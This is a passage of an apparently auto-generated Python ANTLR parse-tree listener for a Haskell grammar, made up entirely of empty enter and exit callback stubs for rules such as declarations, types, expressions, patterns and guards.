def exitWhere_inst(self, ctx:HaskellParser.Where_instContext):
    pass
# Enter a parse tree produced by HaskellParser#decls.
def enterDecls(self, ctx:HaskellParser.DeclsContext):
    pass
# Exit a parse tree produced by HaskellParser#decls.
def exitDecls(self, ctx:HaskellParser.DeclsContext):
    pass
# Enter a parse tree produced by HaskellParser#decllist.
def enterDecllist(self, ctx:HaskellParser.DecllistContext):
    pass
# Exit a parse tree produced by HaskellParser#decllist.
def exitDecllist(self, ctx:HaskellParser.DecllistContext):
    pass
# Enter a parse tree produced by HaskellParser#binds.
def enterBinds(self, ctx:HaskellParser.BindsContext):
    pass
# Exit a parse tree produced by HaskellParser#binds.
def exitBinds(self, ctx:HaskellParser.BindsContext):
    pass
# Enter a parse tree produced by HaskellParser#wherebinds.
def enterWherebinds(self, ctx:HaskellParser.WherebindsContext):
    pass
# Exit a parse tree produced by HaskellParser#wherebinds.
def exitWherebinds(self, ctx:HaskellParser.WherebindsContext):
    pass
# Enter a parse tree produced by HaskellParser#rules.
def enterRules(self, ctx:HaskellParser.RulesContext):
    pass
# Exit a parse tree produced by HaskellParser#rules.
def exitRules(self, ctx:HaskellParser.RulesContext):
    pass
# Enter a parse tree produced by HaskellParser#pragma_rule.
def enterPragma_rule(self, ctx:HaskellParser.Pragma_ruleContext):
    pass
# Exit a parse tree produced by HaskellParser#pragma_rule.
def exitPragma_rule(self, ctx:HaskellParser.Pragma_ruleContext):
    pass
# Enter a parse tree produced by HaskellParser#rule_activation_marker.
def enterRule_activation_marker(self, ctx:HaskellParser.Rule_activation_markerContext):
    pass
# Exit a parse tree produced by HaskellParser#rule_activation_marker.
def exitRule_activation_marker(self, ctx:HaskellParser.Rule_activation_markerContext):
    pass
# Enter a parse tree produced by HaskellParser#rule_activation.
def enterRule_activation(self, ctx:HaskellParser.Rule_activationContext):
    pass
# Exit a parse tree produced by HaskellParser#rule_activation.
def exitRule_activation(self, ctx:HaskellParser.Rule_activationContext):
    pass
# Enter a parse tree produced by HaskellParser#rule_foralls.
def enterRule_foralls(self, ctx:HaskellParser.Rule_forallsContext):
    pass
# Exit a parse tree produced by HaskellParser#rule_foralls.
def exitRule_foralls(self, ctx:HaskellParser.Rule_forallsContext):
    pass
# Enter a parse tree produced by HaskellParser#rule_vars.
def enterRule_vars(self, ctx:HaskellParser.Rule_varsContext):
    pass
# Exit a parse tree produced by HaskellParser#rule_vars.
def exitRule_vars(self, ctx:HaskellParser.Rule_varsContext):
    pass
# Enter a parse tree produced by HaskellParser#rule_var.
def enterRule_var(self, ctx:HaskellParser.Rule_varContext):
    pass
# Exit a parse tree produced by HaskellParser#rule_var.
def exitRule_var(self, ctx:HaskellParser.Rule_varContext):
    pass
# Enter a parse tree produced by HaskellParser#warnings.
def enterWarnings(self, ctx:HaskellParser.WarningsContext):
    pass
# Exit a parse tree produced by HaskellParser#warnings.
def exitWarnings(self, ctx:HaskellParser.WarningsContext):
    pass
# Enter a parse tree produced by HaskellParser#pragma_warning.
def enterPragma_warning(self, ctx:HaskellParser.Pragma_warningContext):
    pass
# Exit a parse tree produced by HaskellParser#pragma_warning.
def exitPragma_warning(self, ctx:HaskellParser.Pragma_warningContext):
    pass
# Enter a parse tree produced by HaskellParser#deprecations.
def enterDeprecations(self, ctx:HaskellParser.DeprecationsContext):
    pass
# Exit a parse tree produced by HaskellParser#deprecations.
def exitDeprecations(self, ctx:HaskellParser.DeprecationsContext):
    pass
# Enter a parse tree produced by HaskellParser#pragma_deprecation.
def enterPragma_deprecation(self, ctx:HaskellParser.Pragma_deprecationContext):
    pass
# Exit a parse tree produced by HaskellParser#pragma_deprecation.
def exitPragma_deprecation(self, ctx:HaskellParser.Pragma_deprecationContext):
    pass
# Enter a parse tree produced by HaskellParser#strings.
def enterStrings(self, ctx:HaskellParser.StringsContext):
    pass
# Exit a parse tree produced by HaskellParser#strings.
def exitStrings(self, ctx:HaskellParser.StringsContext):
    pass
# Enter a parse tree produced by HaskellParser#stringlist.
def enterStringlist(self, ctx:HaskellParser.StringlistContext):
    pass
# Exit a parse tree produced by HaskellParser#stringlist.
def exitStringlist(self, ctx:HaskellParser.StringlistContext):
    pass
# Enter a parse tree produced by HaskellParser#annotation.
def enterAnnotation(self, ctx:HaskellParser.AnnotationContext):
    pass
# Exit a parse tree produced by HaskellParser#annotation.
def exitAnnotation(self, ctx:HaskellParser.AnnotationContext):
    pass
# Enter a parse tree produced by HaskellParser#fdecl.
def enterFdecl(self, ctx:HaskellParser.FdeclContext):
    pass
# Exit a parse tree produced by HaskellParser#fdecl.
def exitFdecl(self, ctx:HaskellParser.FdeclContext):
    pass
# Enter a parse tree produced by HaskellParser#callconv.
def enterCallconv(self, ctx:HaskellParser.CallconvContext):
    pass
# Exit a parse tree produced by HaskellParser#callconv.
def exitCallconv(self, ctx:HaskellParser.CallconvContext):
    pass
# Enter a parse tree produced by HaskellParser#safety.
def enterSafety(self, ctx:HaskellParser.SafetyContext):
    pass
# Exit a parse tree produced by HaskellParser#safety.
def exitSafety(self, ctx:HaskellParser.SafetyContext):
    pass
# Enter a parse tree produced by HaskellParser#fspec.
def enterFspec(self, ctx:HaskellParser.FspecContext):
    pass
# Exit a parse tree produced by HaskellParser#fspec.
def exitFspec(self, ctx:HaskellParser.FspecContext):
    pass
# Enter a parse tree produced by HaskellParser#opt_sig.
def enterOpt_sig(self, ctx:HaskellParser.Opt_sigContext):
    pass
# Exit a parse tree produced by HaskellParser#opt_sig.
def exitOpt_sig(self, ctx:HaskellParser.Opt_sigContext):
    pass
# Enter a parse tree produced by HaskellParser#opt_tyconsig.
def enterOpt_tyconsig(self, ctx:HaskellParser.Opt_tyconsigContext):
    pass
# Exit a parse tree produced by HaskellParser#opt_tyconsig.
def exitOpt_tyconsig(self, ctx:HaskellParser.Opt_tyconsigContext):
    pass
# Enter a parse tree produced by HaskellParser#sigtype.
def enterSigtype(self, ctx:HaskellParser.SigtypeContext):
    pass
# Exit a parse tree produced by HaskellParser#sigtype.
def exitSigtype(self, ctx:HaskellParser.SigtypeContext):
    pass
# Enter a parse tree produced by HaskellParser#sigtypedoc.
def enterSigtypedoc(self, ctx:HaskellParser.SigtypedocContext):
    pass
# Exit a parse tree produced by HaskellParser#sigtypedoc.
def exitSigtypedoc(self, ctx:HaskellParser.SigtypedocContext):
    pass
# Enter a parse tree produced by HaskellParser#sig_vars.
def enterSig_vars(self, ctx:HaskellParser.Sig_varsContext):
    pass
# Exit a parse tree produced by HaskellParser#sig_vars.
def exitSig_vars(self, ctx:HaskellParser.Sig_varsContext):
    pass
# Enter a parse tree produced by HaskellParser#sigtypes1.
def enterSigtypes1(self, ctx:HaskellParser.Sigtypes1Context):
    pass
# Exit a parse tree produced by HaskellParser#sigtypes1.
def exitSigtypes1(self, ctx:HaskellParser.Sigtypes1Context):
    pass
# Enter a parse tree produced by HaskellParser#unpackedness.
def enterUnpackedness(self, ctx:HaskellParser.UnpackednessContext):
    pass
# Exit a parse tree produced by HaskellParser#unpackedness.
def exitUnpackedness(self, ctx:HaskellParser.UnpackednessContext):
    pass
# Enter a parse tree produced by HaskellParser#forall_vis_flag.
def enterForall_vis_flag(self, ctx:HaskellParser.Forall_vis_flagContext):
    pass
# Exit a parse tree produced by HaskellParser#forall_vis_flag.
def exitForall_vis_flag(self, ctx:HaskellParser.Forall_vis_flagContext):
    pass
# Enter a parse tree produced by HaskellParser#ktype.
def enterKtype(self, ctx:HaskellParser.KtypeContext):
    pass
# Exit a parse tree produced by HaskellParser#ktype.
def exitKtype(self, ctx:HaskellParser.KtypeContext):
    pass
# Enter a parse tree produced by HaskellParser#ktypedoc.
def enterKtypedoc(self, ctx:HaskellParser.KtypedocContext):
    pass
# Exit a parse tree produced by HaskellParser#ktypedoc.
def exitKtypedoc(self, ctx:HaskellParser.KtypedocContext):
    pass
# Enter a parse tree produced by HaskellParser#ctype.
def enterCtype(self, ctx:HaskellParser.CtypeContext):
    pass
# Exit a parse tree produced by HaskellParser#ctype.
def exitCtype(self, ctx:HaskellParser.CtypeContext):
    pass
# Enter a parse tree produced by HaskellParser#ctypedoc.
def enterCtypedoc(self, ctx:HaskellParser.CtypedocContext):
    pass
# Exit a parse tree produced by HaskellParser#ctypedoc.
def exitCtypedoc(self, ctx:HaskellParser.CtypedocContext):
    pass
# Enter a parse tree produced by HaskellParser#tycl_context.
def enterTycl_context(self, ctx:HaskellParser.Tycl_contextContext):
    pass
# Exit a parse tree produced by HaskellParser#tycl_context.
def exitTycl_context(self, ctx:HaskellParser.Tycl_contextContext):
    pass
# Enter a parse tree produced by HaskellParser#constr_context.
def enterConstr_context(self, ctx:HaskellParser.Constr_contextContext):
    pass
# Exit a parse tree produced by HaskellParser#constr_context.
def exitConstr_context(self, ctx:HaskellParser.Constr_contextContext):
    pass
# Enter a parse tree produced by HaskellParser#htype.
def enterHtype(self, ctx:HaskellParser.HtypeContext):
    pass
# Exit a parse tree produced by HaskellParser#htype.
def exitHtype(self, ctx:HaskellParser.HtypeContext):
    pass
# Enter a parse tree produced by HaskellParser#typedoc.
def enterTypedoc(self, ctx:HaskellParser.TypedocContext):
    pass
# Exit a parse tree produced by HaskellParser#typedoc.
def exitTypedoc(self, ctx:HaskellParser.TypedocContext):
    pass
# Enter a parse tree produced by HaskellParser#constr_btype.
def enterConstr_btype(self, ctx:HaskellParser.Constr_btypeContext):
    pass
# Exit a parse tree produced by HaskellParser#constr_btype.
def exitConstr_btype(self, ctx:HaskellParser.Constr_btypeContext):
    pass
# Enter a parse tree produced by HaskellParser#constr_tyapps.
def enterConstr_tyapps(self, ctx:HaskellParser.Constr_tyappsContext):
    pass
# Exit a parse tree produced by HaskellParser#constr_tyapps.
def exitConstr_tyapps(self, ctx:HaskellParser.Constr_tyappsContext):
    pass
# Enter a parse tree produced by HaskellParser#constr_tyapp.
def enterConstr_tyapp(self, ctx:HaskellParser.Constr_tyappContext):
    pass
# Exit a parse tree produced by HaskellParser#constr_tyapp.
def exitConstr_tyapp(self, ctx:HaskellParser.Constr_tyappContext):
    pass
# Enter a parse tree produced by HaskellParser#btype.
def enterBtype(self, ctx:HaskellParser.BtypeContext):
    pass
# Exit a parse tree produced by HaskellParser#btype.
def exitBtype(self, ctx:HaskellParser.BtypeContext):
    pass
# Enter a parse tree produced by HaskellParser#tyapps.
def enterTyapps(self, ctx:HaskellParser.TyappsContext):
    pass
# Exit a parse tree produced by HaskellParser#tyapps.
def exitTyapps(self, ctx:HaskellParser.TyappsContext):
    pass
# Enter a parse tree produced by HaskellParser#tyapp.
def enterTyapp(self, ctx:HaskellParser.TyappContext):
    pass
# Exit a parse tree produced by HaskellParser#tyapp.
def exitTyapp(self, ctx:HaskellParser.TyappContext):
    pass
# Enter a parse tree produced by HaskellParser#atype.
def enterAtype(self, ctx:HaskellParser.AtypeContext):
    pass
# Exit a parse tree produced by HaskellParser#atype.
def exitAtype(self, ctx:HaskellParser.AtypeContext):
    pass
# Enter a parse tree produced by HaskellParser#inst_type.
def enterInst_type(self, ctx:HaskellParser.Inst_typeContext):
    pass
# Exit a parse tree produced by HaskellParser#inst_type.
def exitInst_type(self, ctx:HaskellParser.Inst_typeContext):
    pass
# Enter a parse tree produced by HaskellParser#deriv_types.
def enterDeriv_types(self, ctx:HaskellParser.Deriv_typesContext):
    pass
# Exit a parse tree produced by HaskellParser#deriv_types.
def exitDeriv_types(self, ctx:HaskellParser.Deriv_typesContext):
    pass
# Enter a parse tree produced by HaskellParser#comma_types.
def enterComma_types(self, ctx:HaskellParser.Comma_typesContext):
    pass
# Exit a parse tree produced by HaskellParser#comma_types.
def exitComma_types(self, ctx:HaskellParser.Comma_typesContext):
    pass
# Enter a parse tree produced by HaskellParser#bar_types2.
def enterBar_types2(self, ctx:HaskellParser.Bar_types2Context):
    pass
# Exit a parse tree produced by HaskellParser#bar_types2.
def exitBar_types2(self, ctx:HaskellParser.Bar_types2Context):
    pass
# Enter a parse tree produced by HaskellParser#tv_bndrs.
def enterTv_bndrs(self, ctx:HaskellParser.Tv_bndrsContext):
    pass
# Exit a parse tree produced by HaskellParser#tv_bndrs.
def exitTv_bndrs(self, ctx:HaskellParser.Tv_bndrsContext):
    pass
# Enter a parse tree produced by HaskellParser#tv_bndr.
def enterTv_bndr(self, ctx:HaskellParser.Tv_bndrContext):
    pass
# Exit a parse tree produced by HaskellParser#tv_bndr.
def exitTv_bndr(self, ctx:HaskellParser.Tv_bndrContext):
    pass
# Enter a parse tree produced by HaskellParser#tv_bndr_no_braces.
def enterTv_bndr_no_braces(self, ctx:HaskellParser.Tv_bndr_no_bracesContext):
    pass
# Exit a parse tree produced by HaskellParser#tv_bndr_no_braces.
def exitTv_bndr_no_braces(self, ctx:HaskellParser.Tv_bndr_no_bracesContext):
    pass
# Enter a parse tree produced by HaskellParser#fds.
def enterFds(self, ctx:HaskellParser.FdsContext):
    pass
# Exit a parse tree produced by HaskellParser#fds.
def exitFds(self, ctx:HaskellParser.FdsContext):
    pass
# Enter a parse tree produced by HaskellParser#fds1.
def enterFds1(self, ctx:HaskellParser.Fds1Context):
    pass
# Exit a parse tree produced by HaskellParser#fds1.
def exitFds1(self, ctx:HaskellParser.Fds1Context):
    pass
# Enter a parse tree produced by HaskellParser#fd.
def enterFd(self, ctx:HaskellParser.FdContext):
    pass
# Exit a parse tree produced by HaskellParser#fd.
def exitFd(self, ctx:HaskellParser.FdContext):
    pass
# Enter a parse tree produced by HaskellParser#varids0.
def enterVarids0(self, ctx:HaskellParser.Varids0Context):
    pass
# Exit a parse tree produced by HaskellParser#varids0.
def exitVarids0(self, ctx:HaskellParser.Varids0Context):
    pass
# Enter a parse tree produced by HaskellParser#kind.
def enterKind(self, ctx:HaskellParser.KindContext):
    pass
# Exit a parse tree produced by HaskellParser#kind.
def exitKind(self, ctx:HaskellParser.KindContext):
    pass
# Enter a parse tree produced by HaskellParser#gadt_constrlist.
def enterGadt_constrlist(self, ctx:HaskellParser.Gadt_constrlistContext):
    pass
# Exit a parse tree produced by HaskellParser#gadt_constrlist.
def exitGadt_constrlist(self, ctx:HaskellParser.Gadt_constrlistContext):
    pass
# Enter a parse tree produced by HaskellParser#gadt_constrs.
def enterGadt_constrs(self, ctx:HaskellParser.Gadt_constrsContext):
    pass
# Exit a parse tree produced by HaskellParser#gadt_constrs.
def exitGadt_constrs(self, ctx:HaskellParser.Gadt_constrsContext):
    pass
# Enter a parse tree produced by HaskellParser#gadt_constr_with_doc.
def enterGadt_constr_with_doc(self, ctx:HaskellParser.Gadt_constr_with_docContext):
    pass
# Exit a parse tree produced by HaskellParser#gadt_constr_with_doc.
def exitGadt_constr_with_doc(self, ctx:HaskellParser.Gadt_constr_with_docContext):
    pass
# Enter a parse tree produced by HaskellParser#gadt_constr.
def enterGadt_constr(self, ctx:HaskellParser.Gadt_constrContext):
    pass
# Exit a parse tree produced by HaskellParser#gadt_constr.
def exitGadt_constr(self, ctx:HaskellParser.Gadt_constrContext):
    pass
# Enter a parse tree produced by HaskellParser#constrs.
def enterConstrs(self, ctx:HaskellParser.ConstrsContext):
    pass
# Exit a parse tree produced by HaskellParser#constrs.
def exitConstrs(self, ctx:HaskellParser.ConstrsContext):
    pass
# Enter a parse tree produced by HaskellParser#constrs1.
def enterConstrs1(self, ctx:HaskellParser.Constrs1Context):
    pass
# Exit a parse tree produced by HaskellParser#constrs1.
def exitConstrs1(self, ctx:HaskellParser.Constrs1Context):
    pass
# Enter a parse tree produced by HaskellParser#constr.
def enterConstr(self, ctx:HaskellParser.ConstrContext):
    pass
# Exit a parse tree produced by HaskellParser#constr.
def exitConstr(self, ctx:HaskellParser.ConstrContext):
    pass
# Enter a parse tree produced by HaskellParser#forall.
def enterForall(self, ctx:HaskellParser.ForallContext):
    pass
# Exit a parse tree produced by HaskellParser#forall.
def exitForall(self, ctx:HaskellParser.ForallContext):
    pass
# Enter a parse tree produced by HaskellParser#constr_stuff.
def enterConstr_stuff(self, ctx:HaskellParser.Constr_stuffContext):
    pass
# Exit a parse tree produced by HaskellParser#constr_stuff.
def exitConstr_stuff(self, ctx:HaskellParser.Constr_stuffContext):
    pass
# Enter a parse tree produced by HaskellParser#fielddecls.
def enterFielddecls(self, ctx:HaskellParser.FielddeclsContext):
    pass
# Exit a parse tree produced by HaskellParser#fielddecls.
def exitFielddecls(self, ctx:HaskellParser.FielddeclsContext):
    pass
# Enter a parse tree produced by HaskellParser#fielddecl.
def enterFielddecl(self, ctx:HaskellParser.FielddeclContext):
    pass
# Exit a parse tree produced by HaskellParser#fielddecl.
def exitFielddecl(self, ctx:HaskellParser.FielddeclContext):
    pass
# Enter a parse tree produced by HaskellParser#derivings.
def enterDerivings(self, ctx:HaskellParser.DerivingsContext):
    pass
# Exit a parse tree produced by HaskellParser#derivings.
def exitDerivings(self, ctx:HaskellParser.DerivingsContext):
    pass
# Enter a parse tree produced by HaskellParser#deriving.
def enterDeriving(self, ctx:HaskellParser.DerivingContext):
    pass
# Exit a parse tree produced by HaskellParser#deriving.
def exitDeriving(self, ctx:HaskellParser.DerivingContext):
    pass
# Enter a parse tree produced by HaskellParser#deriv_clause_types.
def enterDeriv_clause_types(self, ctx:HaskellParser.Deriv_clause_typesContext):
    pass
# Exit a parse tree produced by HaskellParser#deriv_clause_types.
def exitDeriv_clause_types(self, ctx:HaskellParser.Deriv_clause_typesContext):
    pass
# Enter a parse tree produced by HaskellParser#decl_no_th.
def enterDecl_no_th(self, ctx:HaskellParser.Decl_no_thContext):
    pass
# Exit a parse tree produced by HaskellParser#decl_no_th.
def exitDecl_no_th(self, ctx:HaskellParser.Decl_no_thContext):
    pass
# Enter a parse tree produced by HaskellParser#decl.
def enterDecl(self, ctx:HaskellParser.DeclContext):
    pass
# Exit a parse tree produced by HaskellParser#decl.
def exitDecl(self, ctx:HaskellParser.DeclContext):
    pass
# Enter a parse tree produced by HaskellParser#rhs.
def enterRhs(self, ctx:HaskellParser.RhsContext):
    pass
# Exit a parse tree produced by HaskellParser#rhs.
def exitRhs(self, ctx:HaskellParser.RhsContext):
    pass
# Enter a parse tree produced by HaskellParser#gdrhs.
def enterGdrhs(self, ctx:HaskellParser.GdrhsContext):
    pass
# Exit a parse tree produced by HaskellParser#gdrhs.
def exitGdrhs(self, ctx:HaskellParser.GdrhsContext):
    pass
# Enter a parse tree produced by HaskellParser#gdrh.
def enterGdrh(self, ctx:HaskellParser.GdrhContext):
    pass
# Exit a parse tree produced by HaskellParser#gdrh.
def exitGdrh(self, ctx:HaskellParser.GdrhContext):
    pass
# Enter a parse tree produced by HaskellParser#sigdecl.
def enterSigdecl(self, ctx:HaskellParser.SigdeclContext):
    pass
# Exit a parse tree produced by HaskellParser#sigdecl.
def exitSigdecl(self, ctx:HaskellParser.SigdeclContext):
    pass
# Enter a parse tree produced by HaskellParser#activation.
def enterActivation(self, ctx:HaskellParser.ActivationContext):
    pass
# Exit a parse tree produced by HaskellParser#activation.
def exitActivation(self, ctx:HaskellParser.ActivationContext):
    pass
# Enter a parse tree produced by HaskellParser#th_quasiquote.
def enterTh_quasiquote(self, ctx:HaskellParser.Th_quasiquoteContext):
    pass
# Exit a parse tree produced by HaskellParser#th_quasiquote.
def exitTh_quasiquote(self, ctx:HaskellParser.Th_quasiquoteContext):
    pass
# Enter a parse tree produced by HaskellParser#th_qquasiquote.
def enterTh_qquasiquote(self, ctx:HaskellParser.Th_qquasiquoteContext):
    pass
# Exit a parse tree produced by HaskellParser#th_qquasiquote.
def exitTh_qquasiquote(self, ctx:HaskellParser.Th_qquasiquoteContext):
    pass
# Enter a parse tree produced by HaskellParser#quasiquote.
def enterQuasiquote(self, ctx:HaskellParser.QuasiquoteContext):
    pass
# Exit a parse tree produced by HaskellParser#quasiquote.
def exitQuasiquote(self, ctx:HaskellParser.QuasiquoteContext):
    pass
# Enter a parse tree produced by HaskellParser#exp.
def enterExp(self, ctx:HaskellParser.ExpContext):
    pass
# Exit a parse tree produced by HaskellParser#exp.
def exitExp(self, ctx:HaskellParser.ExpContext):
    pass
# Enter a parse tree produced by HaskellParser#infixexp.
def enterInfixexp(self, ctx:HaskellParser.InfixexpContext):
    pass
# Exit a parse tree produced by HaskellParser#infixexp.
def exitInfixexp(self, ctx:HaskellParser.InfixexpContext):
    pass
# Enter a parse tree produced by HaskellParser#exp10p.
def enterExp10p(self, ctx:HaskellParser.Exp10pContext):
    pass
# Exit a parse tree produced by HaskellParser#exp10p.
def exitExp10p(self, ctx:HaskellParser.Exp10pContext):
    pass
# Enter a parse tree produced by HaskellParser#exp10.
def enterExp10(self, ctx:HaskellParser.Exp10Context):
    pass
# Exit a parse tree produced by HaskellParser#exp10.
def exitExp10(self, ctx:HaskellParser.Exp10Context):
    pass
# Enter a parse tree produced by HaskellParser#fexp.
def enterFexp(self, ctx:HaskellParser.FexpContext):
    pass
# Exit a parse tree produced by HaskellParser#fexp.
def exitFexp(self, ctx:HaskellParser.FexpContext):
    pass
# Enter a parse tree produced by HaskellParser#aexp.
def enterAexp(self, ctx:HaskellParser.AexpContext):
    pass
# Exit a parse tree produced by HaskellParser#aexp.
def exitAexp(self, ctx:HaskellParser.AexpContext):
    pass
# Enter a parse tree produced by HaskellParser#aexp1.
def enterAexp1(self, ctx:HaskellParser.Aexp1Context):
    pass
# Exit a parse tree produced by HaskellParser#aexp1.
def exitAexp1(self, ctx:HaskellParser.Aexp1Context):
    pass
# Enter a parse tree produced by HaskellParser#aexp2.
def enterAexp2(self, ctx:HaskellParser.Aexp2Context):
    pass
# Exit a parse tree produced by HaskellParser#aexp2.
def exitAexp2(self, ctx:HaskellParser.Aexp2Context):
    pass
# Enter a parse tree produced by HaskellParser#splice_exp.
def enterSplice_exp(self, ctx:HaskellParser.Splice_expContext):
    pass
# Exit a parse tree produced by HaskellParser#splice_exp.
def exitSplice_exp(self, ctx:HaskellParser.Splice_expContext):
    pass
# Enter a parse tree produced by HaskellParser#splice_untyped.
def enterSplice_untyped(self, ctx:HaskellParser.Splice_untypedContext):
    pass
# Exit a parse tree produced by HaskellParser#splice_untyped.
def exitSplice_untyped(self, ctx:HaskellParser.Splice_untypedContext):
    pass
# Enter a parse tree produced by HaskellParser#splice_typed.
def enterSplice_typed(self, ctx:HaskellParser.Splice_typedContext):
    pass
# Exit a parse tree produced by HaskellParser#splice_typed.
def exitSplice_typed(self, ctx:HaskellParser.Splice_typedContext):
    pass
# Enter a parse tree produced by HaskellParser#cmdargs.
def enterCmdargs(self, ctx:HaskellParser.CmdargsContext):
    pass
# Exit a parse tree produced by HaskellParser#cmdargs.
def exitCmdargs(self, ctx:HaskellParser.CmdargsContext):
    pass
# Enter a parse tree produced by HaskellParser#acmd.
def enterAcmd(self, ctx:HaskellParser.AcmdContext):
    pass
# Exit a parse tree produced by HaskellParser#acmd.
def exitAcmd(self, ctx:HaskellParser.AcmdContext):
    pass
# Enter a parse tree produced by HaskellParser#cvtopbody.
def enterCvtopbody(self, ctx:HaskellParser.CvtopbodyContext):
    pass
# Exit a parse tree produced by HaskellParser#cvtopbody.
def exitCvtopbody(self, ctx:HaskellParser.CvtopbodyContext):
    pass
# Enter a parse tree produced by HaskellParser#cvtopdecls0.
def enterCvtopdecls0(self, ctx:HaskellParser.Cvtopdecls0Context):
    pass
# Exit a parse tree produced by HaskellParser#cvtopdecls0.
def exitCvtopdecls0(self, ctx:HaskellParser.Cvtopdecls0Context):
    pass
# Enter a parse tree produced by HaskellParser#texp.
def enterTexp(self, ctx:HaskellParser.TexpContext):
    pass
# Exit a parse tree produced by HaskellParser#texp.
def exitTexp(self, ctx:HaskellParser.TexpContext):
    pass
# Enter a parse tree produced by HaskellParser#tup_exprs.
def enterTup_exprs(self, ctx:HaskellParser.Tup_exprsContext):
    pass
# Exit a parse tree produced by HaskellParser#tup_exprs.
def exitTup_exprs(self, ctx:HaskellParser.Tup_exprsContext):
    pass
# Enter a parse tree produced by HaskellParser#commas_tup_tail.
def enterCommas_tup_tail(self, ctx:HaskellParser.Commas_tup_tailContext):
    pass
# Exit a parse tree produced by HaskellParser#commas_tup_tail.
def exitCommas_tup_tail(self, ctx:HaskellParser.Commas_tup_tailContext):
    pass
# Enter a parse tree produced by HaskellParser#tup_tail.
def enterTup_tail(self, ctx:HaskellParser.Tup_tailContext):
    pass
# Exit a parse tree produced by HaskellParser#tup_tail.
def exitTup_tail(self, ctx:HaskellParser.Tup_tailContext):
    pass
# Enter a parse tree produced by HaskellParser#lst.
def enterLst(self, ctx:HaskellParser.LstContext):
    pass
# Exit a parse tree produced by HaskellParser#lst.
def exitLst(self, ctx:HaskellParser.LstContext):
    pass
# Enter a parse tree produced by HaskellParser#lexps.
def enterLexps(self, ctx:HaskellParser.LexpsContext):
    pass
# Exit a parse tree produced by HaskellParser#lexps.
def exitLexps(self, ctx:HaskellParser.LexpsContext):
    pass
# Enter a parse tree produced by HaskellParser#flattenedpquals.
def enterFlattenedpquals(self, ctx:HaskellParser.FlattenedpqualsContext):
    pass
# Exit a parse tree produced by HaskellParser#flattenedpquals.
def exitFlattenedpquals(self, ctx:HaskellParser.FlattenedpqualsContext):
    pass
# Enter a parse tree produced by HaskellParser#pquals.
def enterPquals(self, ctx:HaskellParser.PqualsContext):
    pass
# Exit a parse tree produced by HaskellParser#pquals.
def exitPquals(self, ctx:HaskellParser.PqualsContext):
    pass
# Enter a parse tree produced by HaskellParser#squals.
def enterSquals(self, ctx:HaskellParser.SqualsContext):
    pass
# Exit a parse tree produced by HaskellParser#squals.
def exitSquals(self, ctx:HaskellParser.SqualsContext):
    pass
# Enter a parse tree produced by HaskellParser#transformqual.
def enterTransformqual(self, ctx:HaskellParser.TransformqualContext):
    pass
# Exit a parse tree produced by HaskellParser#transformqual.
def exitTransformqual(self, ctx:HaskellParser.TransformqualContext):
    pass
# Enter a parse tree produced by HaskellParser#guards.
def enterGuards(self, ctx:HaskellParser.GuardsContext):
    pass
# Exit a parse tree produced by HaskellParser#guards.
def exitGuards(self, ctx:HaskellParser.GuardsContext):
    pass
# Enter a parse tree produced by HaskellParser#guard.
def enterGuard(self, ctx:HaskellParser.GuardContext):
    pass
# Exit a parse tree produced by HaskellParser#guard.
def exitGuard(self, ctx:HaskellParser.GuardContext):
    pass
# Enter a parse tree produced by HaskellParser#alts.
def enterAlts(self, ctx:HaskellParser.AltsContext):
    pass
# Exit a parse tree produced by HaskellParser#alts.
def exitAlts(self, ctx:HaskellParser.AltsContext):
    pass
# Enter a parse tree produced by HaskellParser#alt.
def enterAlt(self, ctx:HaskellParser.AltContext):
    pass
# Exit a parse tree produced by HaskellParser#alt.
def exitAlt(self, ctx:HaskellParser.AltContext):
    pass
# Enter a parse tree produced by HaskellParser#alt_rhs.
def enterAlt_rhs(self, ctx:HaskellParser.Alt_rhsContext):
    pass
# Exit a parse tree produced by HaskellParser#alt_rhs.
def exitAlt_rhs(self, ctx:HaskellParser.Alt_rhsContext):
    pass
# Enter a parse tree produced by HaskellParser#ralt.
def enterRalt(self, ctx:HaskellParser.RaltContext):
    pass
# Exit a parse tree produced by HaskellParser#ralt.
def exitRalt(self, ctx:HaskellParser.RaltContext):
    pass
# Enter a parse tree produced by HaskellParser#gdpats.
def enterGdpats(self, ctx:HaskellParser.GdpatsContext):
    pass
# Exit a parse tree produced by HaskellParser#gdpats.
def exitGdpats(self, ctx:HaskellParser.GdpatsContext):
    pass
# Enter a parse tree produced by HaskellParser#ifgdpats.
def enterIfgdpats(self, ctx:HaskellParser.IfgdpatsContext):
    pass
# Exit a parse tree produced by HaskellParser#ifgdpats.
def exitIfgdpats(self, ctx:HaskellParser.IfgdpatsContext):
    pass
# Enter a parse tree produced by HaskellParser#gdpat.
def enterGdpat(self, ctx:HaskellParser.GdpatContext):
    pass
# Exit a parse tree produced by HaskellParser#gdpat.
def exitGdpat(self, ctx:HaskellParser.GdpatContext):
    pass
# Enter a parse tree produced by HaskellParser#pat.
def enterPat(self, ctx:HaskellParser.PatContext):
    pass
# Exit a parse tree produced by HaskellParser#pat.
def exitPat(self, ctx:HaskellParser.PatContext):
    pass
# Enter a parse tree produced by HaskellParser#bindpat.
def enterBindpat(self, ctx:HaskellParser.BindpatContext):
    pass
# Exit a parse tree produced by HaskellParser#bindpat.
def exitBindpat(self, ctx:HaskellParser.BindpatContext):
    pass
# Enter a parse tree produced by HaskellParser#apat.
def enterApat(self, ctx:HaskellParser.ApatContext):
    pass
# Exit a parse tree produced by HaskellParser#apat.
def exitApat(self, ctx:HaskellParser.ApatContext):
    pass
# Enter a parse tree produced by HaskellParser#apats.
def enterApats(self, ctx:HaskellParser.ApatsContext):
    pass
# Exit a parse tree produced by HaskellParser#apats.
def exitApats(self, ctx:HaskellParser.ApatsContext):
    pass
# Enter a parse tree produced by HaskellParser#fpat.
def enterFpat(self, ctx:HaskellParser.FpatContext):
    pass
# Exit a parse tree produced by HaskellParser#fpat.
def exitFpat(self, ctx:HaskellParser.FpatContext):
    pass
# Enter a parse tree produced by HaskellParser#stmtlist.
def enterStmtlist(self, ctx:HaskellParser.StmtlistContext):
    pass
# Exit a parse tree produced by HaskellParser#stmtlist.
def exitStmtlist(self, ctx:HaskellParser.StmtlistContext):
    pass
# Enter a parse tree produced by HaskellParser#stmts.
def enterStmts(self, ctx:HaskellParser.StmtsContext):
    pass
# Exit a parse tree produced by HaskellParser#stmts.
def exitStmts(self, ctx:HaskellParser.StmtsContext):
    pass
# Enter a parse tree produced by HaskellParser#stmt.
def enterStmt(self, ctx:HaskellParser.StmtContext):
    pass
# Exit a parse tree produced by HaskellParser#stmt.
def exitStmt(self, ctx:HaskellParser.StmtContext):
    pass
# Enter a parse tree produced by HaskellParser#qual.
def enterQual(self, ctx:HaskellParser.QualContext):
    pass
# Exit a parse tree produced by HaskellParser#qual.
